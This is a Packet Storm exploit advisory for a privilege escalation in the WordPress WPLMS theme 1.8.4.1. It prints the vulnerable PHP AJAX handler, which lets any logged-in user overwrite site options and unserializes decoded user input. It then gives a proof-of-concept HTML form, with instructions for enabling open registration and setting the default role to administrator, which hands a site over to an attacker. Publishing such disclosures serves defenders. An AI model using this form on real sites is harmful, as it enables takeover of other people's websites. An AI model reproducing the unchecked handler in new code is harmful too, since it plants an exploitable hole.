what you don't know can hurt you

WordPress WPLMS 1.8.4.1 Privilege Escalation

WordPress WPLMS 1.8.4.1 Privilege Escalation
Posted Feb 8, 2015
Authored by Evex

WordPress WPLMS theme version 1.8.4.1 suffers from a privilege escalation vulnerability.

tags | exploit
MD5 | a143e65ca34ec5906d471c2a962e6fc2

WordPress WPLMS 1.8.4.1 Privilege Escalation

Change Mirror Download
------------------------------------------------------------------------------
WordPress WPLMS Theme Previlege Escalation
------------------------------------------------------------------------------

[-] Author: Evex

http://packetstormsecurity.com/user/evex/
twitter: https://twitter.com/Evexola

[-] Theme Link:

http://themeforest.net/item/wplms-learning-management-system/6780226


[-] Affected Version:

Version 1.8.4.1


[-] Vulnerability Description:

The vulnerable code is located in the /includes/func.php
script:


add_action( 'wp_ajax_import_data', 'import_data' );
function import_data(){
$name = stripslashes($_POST['name']);
$code = base64_decode(trim($_POST['code']));
if(is_string($code))
$code = unserialize ($code);
$value = get_option($name);
if(isset($value)){
update_option($name,$code);
}else{
echo "Error, Option does not exist !";
}
die();
}


then function import_data can be called by logged in users
and executed which can lead to modifying wordpress settings and adding a
new administrator which may cause the site a full take over


[-] Proof of Concept:


(Must be submited with a logged in user)
OPTION:
admin_email, default_role, users_can_register

Value(must be serialized then encoded by base64):
users_can_register (0,1)

default_role (administrator, author, editor...)

admin_email( whatever@duh.com )

<form action="http://domain.tld/wp-admin/admin-ajax.php?action=import_data"
method="post" >
<input type="hidden" name="name" value="OPTION" />
<input type="hidden" name="code" value="VALUE" />
<button type="submit" >Submit</button>
</form>
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    11 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close